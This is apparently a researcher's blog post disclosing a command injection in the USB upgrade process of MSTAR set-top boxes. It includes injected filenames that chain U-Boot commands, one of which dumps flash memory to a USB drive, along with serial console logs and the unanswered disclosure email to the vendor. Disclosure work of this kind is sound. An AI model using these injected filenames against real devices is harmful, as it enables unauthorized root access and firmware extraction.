Ivan Marković

Security consultant and researcher

Long experience in designing and implementation of security solutions, mainly oriented on web, mobile and embedded applications. Author of penetration testing tools, recognized by OWASP organization and BackTrack Linux distribution. Researching work includes discovery of vulnerabilities of numeral applications and services, and for these, author received public apreciations by Microsoft Company..

Contact via Linkedin or read interesting staff on Twitter.

Command injections via USB upgrade in MSTAR Set-Top box products

27.04.2018

While I was working on diagnostic device for some of my clients I found command injections in MSTAR Set-Top box products. Diagnostic device is not specially target this vendor but we used it in development phase and for testing. Vulnerable functionality is in automatic USB upgrade process. It is possible to inject additional commands via malicious files names.

For example, to upgrade your Set-Top box, you just need to put firmware file on USB drive with filename "auto_upgrade.bin" and after you insert it and restart device, it will be automaticaly upgraded. This fuctionality can be also exploited by inserting additional commands in filename. One of the first that I try is "auto_upgrade.bin;help" and we can check that command injection works from serial console output:

2017-02-13 18:48:51	U-Boot 1.1.6 (Aug 22 2016 - 16:45:10)
2017-02-13 18:48:51	
2017-02-13 18:48:51	Board: MSTAR KRITI (CPU Speed 576 MHz)
2017-02-13 18:48:51	DRAM:  64 X 0 MBytes
2017-02-13 18:48:51	U-Boot is running at DRAM 0x87610000
2017-02-13 18:48:51	Module: USB FAT FLASH SPI LOGO OSD ENV=SERIAL 
2017-02-13 18:48:51	Flash is detected (0x0C02, 0xC8, 0x40, 0x16)
2017-02-13 18:48:51	In:    serial
2017-02-13 18:48:51	Out:   serial
2017-02-13 18:48:51	Err:   serial
2017-02-13 18:48:51	MSVC00B000100100208768TH0000000T
2017-02-13 18:48:51	MDrv_PNL_Init u32PnlRiuBaseAddr = BF200000
2017-02-13 18:48:51	MDrv_PNL_Init u32PMRiuBaseAddr = BF000000
2017-02-13 18:48:52	Panel Library mismatch(03), please update to version 04
2017-02-13 18:48:52	[_MDrv_PNL_Init_LPLL][305]pstPanelInitData->u16Width=1920, pstPanelInitData->u16Height=1080
2017-02-13 18:48:52	[_MDrv_PNL_Init_LPLL][307]u16HTotal=2640,u16VTotal=1125,pstPanelInitData->u16HTotal=2640,pstPanelInitData->u16VTotal=1125, u16DefaultVFreq=500
2017-02-13 18:48:52	[_MDrv_PNL_Init_Output_Dclk][350]pstPanelInitData->u16Width=1920, pstPanelInitData->u16Height=1080
2017-02-13 18:48:52	[_MDrv_PNL_Init_Output_Dclk][352]u16HTotal=2640,u16VTotal=1125,pstPanelInitData->u16HTotal=2640,pstPanelInitData->u16VTotal=1125, u16DefaultVFreq=500
2017-02-13 18:48:52	[XC,Version] 00442327
2017-02-13 18:48:52	 no need to patch
2017-02-13 18:48:52	DAC eTiming =6
2017-02-13 18:48:52	HDMITx eTiming =7
2017-02-13 18:48:52	HDMITx eTiming =7
2017-02-13 18:48:52	Create Dolby single part name task failed!!
2017-02-13 18:48:52	[Hal_VE_EnableDI][1430] bEnable = 0, bIsDNR2VE = 0
2017-02-13 18:48:52	u32ReadBuffVirAddr = A0000000, u32IntBuffVirAddr = A0100000, u32OutBuffVirAddr = A0730000
2017-02-13 18:48:52	verJPD_SetStatus >>>>>>>>>>> w:720,  h:576,  p:720
2017-02-13 18:48:52	
2017-02-13 18:48:52	[GOP3, PID 0, TID 0x-1][Driver Version]: 0089, BuildNum: 0002, ChangeList: 00524916
2017-02-13 18:48:52	 keypad_pressed is [0] 
2017-02-13 18:48:52	 ir_pressed is [0] 
2017-02-13 18:48:52	Hit any key to stop autoboot:  0 
2017-02-13 18:48:52	Check USB port[0]:
2017-02-13 18:48:53	Host type:2 
2017-02-13 18:48:53	scanning bus for devices... 1 USB Device(s) found
2017-02-13 18:48:53	       scanning bus for storage devices... bulk max packet size: ep 200 ep2 200
2017-02-13 18:48:53	usb_stor_Bulk_max_lun: 0 
2017-02-13 18:48:53	1 Storage Device(s) found
2017-02-13 18:48:53	reading auto_upgrade.bin
2017-02-13 18:48:53	
2017-02-13 18:48:53	** Unable to read "auto_upgrade.bin" from usb 0:1 **
2017-02-13 18:48:53	cmd fatload usb 0  80000000 auto_upgrade.bin 1 failed
2017-02-13 18:48:53	?       - alias for 'help'
2017-02-13 18:48:53	
2017-02-13 18:48:53	do Lzma for compress image
2017-02-13 18:48:53	
2017-02-13 18:48:53	autoboot   - Continue auto-boot flow
2017-02-13 18:48:53	
2017-02-13 18:48:53	base    - print or set address offset
2017-02-13 18:48:53	
2017-02-13 18:48:53	bdinfo  - print Board Info structure
2017-02-13 18:48:53	
2017-02-13 18:48:53	boot_logo - Logo display 
...

You can also chain your commands:

"auto_upgrade.bin;help;bdinfo;boot_logo;coninfo;fatinfo;printenv;version;.bin"

...
2017-02-13 18:49:57	ustar   - update kernal & root file system automatically by script file
2017-02-13 18:49:57	
2017-02-13 18:49:57	version - print monitor version
2017-02-13 18:49:57	
2017-02-13 18:49:57	boot_params = 0x877958E0
2017-02-13 18:49:57	memstart    = 0x80000000
2017-02-13 18:49:57	memsize     = 0x08000000
2017-02-13 18:49:57	flashstart  = 0xBFC00000
2017-02-13 18:49:57	flashsize   = 0x00800000
2017-02-13 18:49:57	flashoffset = 0x00000000
2017-02-13 18:49:57	ethaddr     =
2017-02-13 18:49:57	 00:00:00:00:00:00
2017-02-13 18:49:57	ip_addr     = 
2017-02-13 18:49:57	0.0.0.0
2017-02-13 18:49:57	
2017-02-13 18:49:57	baudrate    = 0 bps
2017-02-13 18:49:57	Usage:
2017-02-13 18:49:57	boot_logo - Logo display 
2017-02-13 18:49:57	
2017-02-13 18:49:57	List of available devices:
2017-02-13 18:49:57	
2017-02-13 18:49:57	serial   80000003 SIO stdin stdout stderr 
2017-02-13 18:49:57	usage: fatinfo  
2017-02-13 18:49:57	bootdelay=0
2017-02-13 18:49:57	baudrate=115200
2017-02-13 18:49:57	preboot=echo;echo Type "help" for more commands.
2017-02-13 18:49:57	MS_BOARD=BD_MST204A_D01A
2017-02-13 18:49:57	logo_cmd=boot_logo 0 0 1 1
2017-02-13 18:49:57	OAD_IN_MBOOT=1
2017-02-13 18:49:57	info_exchange=spi
2017-02-13 18:49:57	CUSTOMER_OUI=0x226D
2017-02-13 18:49:57	AP_SW_MODEL=0x0208
2017-02-13 18:49:57	HW_MODEL=0x2210
2017-02-13 18:49:57	HW_VERSION=0x0001
2017-02-13 18:49:57	CHIP_VERSION=U03
2017-02-13 18:49:58	BOARD_TYPE_SEL=0x0CFF
2017-02-13 18:49:58	BUILDCL=0xEAF49
2017-02-13 18:49:58	bootcmd=spi_rdc 0x80b00000 0x7001c 0x2ac77e; LzmaDec 0x80b00000 0x2ac77e 0x80000180 0x81000000; go 0x80000224;
2017-02-13 18:49:58	AP_SW_VERSION=0x0001
2017-02-13 18:49:58	usb_complete=0
2017-02-13 18:49:58	filesize=4
2017-02-13 18:49:58	panel_cmd=set_paneltype 12
2017-02-13 18:49:58	OAD_NEED_UPGRADE=0
2017-02-13 18:49:58	OAD_NEED_SCAN=0
2017-02-13 18:49:58	USBUpdateFlag=0
2017-02-13 18:49:58	usb_upgrade=1
2017-02-13 18:49:58	usb_upgrade_port=0
2017-02-13 18:49:58	partno=1
2017-02-13 18:49:58	usb_upgrade_path=auto_upgrade.bin;help;bdinfo;boot_logo;coninfo;fatinfo;printenv;version;.bin
2017-02-13 18:49:58	stdin=serial
2017-02-13 18:49:58	stdout=serial
2017-02-13 18:49:58	stderr=serial
2017-02-13 18:49:58	
2017-02-13 18:49:58	Environment size: 703/65532 bytes
2017-02-13 18:49:58	
2017-02-13 18:49:58	U-Boot 1.1.6 (Aug 22 2016 - 16:45:10)
2017-02-13 18:49:58	start get
...

Serial console doesn't accept any input because "bootdelay=0", but with command injection in USB upgrade process we can find a way to configure U-Boot and get a root:

2017-02-13 19:11:25	BOOTSPI
2017-02-13 19:11:25	BIST0_OK
2017-02-13 19:11:25 	_OK!decomp
2017-02-13 19:11:25 	_done
2017-02-13 19:11:25	done
2017-02-13 19:11:25	
2017-02-13 19:11:25	Hello U-Boot
2017-02-13 19:11:25	
2017-02-13 19:11:25	U-Boot 1.1.6 (Aug 22 2016 - 16:45:10)
2017-02-13 19:11:25	
2017-02-13 19:11:25	Board: MSTAR KRITI (CPU Speed 576 MHz)
2017-02-13 19:11:25	DRAM:  64 X 0 MBytes
2017-02-13 19:11:25	U-Boot is running at DRAM 0x87610000
2017-02-13 19:11:26	Module: USB FAT FLASH SPI LOGO OSD ENV=SERIAL 
2017-02-13 19:11:26	Flash is detected (0x0C02, 0xC8, 0x40, 0x16)
2017-02-13 19:11:26	In:    serial
2017-02-13 19:11:26	Out:   serial
2017-02-13 19:11:26	Err:   serial
...
2017-02-13 19:11:26 	keypad_pressed is [0] 
2017-02-13 19:11:26	 ir_pressed is [0]
...
2017-02-13 19:11:26	<< MStar >>#
...

I also try to contact vendor about this issue, but I didn't receive response:

To: contact_europe@mstarsemi.com, security-alert@mstarsemi.com,
 secure@mstarsemi.com, security@mstarsemi.com, support@mstarsemi.com,
 info@mstarsemi.com
From: IM 
Subject: Command injection in Set-Top Box USB upgrade procedure
Message-ID: <8a9e4502-1963-1bae-3aeb-88e5a16699e4@security-net.biz>
Date: Fri, 27 Oct 2017 15:06:19 +0200
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:52.0)
 Gecko/20100101 Thunderbird/52.4.0
MIME-Version: 1.0
Content-Type: text/plain; charset=utf-8; format=flowed
Content-Transfer-Encoding: 7bit
Content-Language: en-US

Hello,

I'm working on some diagnostic device and during the testing I found 
command injection in some of yours products.
It is possible to inject additional commands via malicious files names, 
for example:

"auto_upgrade.bin;fatwrite usb 0 0xBFC00000 backup.bin 0x400000;"

I will publish this findings in my research paper about device that I'm 
working on.
Please contact me if you want to make coordinated disclosure or if you 
need more details.

Best regards,
Ivan Markovic
https://security-net.biz/

You can download more serial console dump here: CoolTerm-Capture-2017-02-13.txt
GitHub: Command injections via USB upgrade in MSTAR Set Top box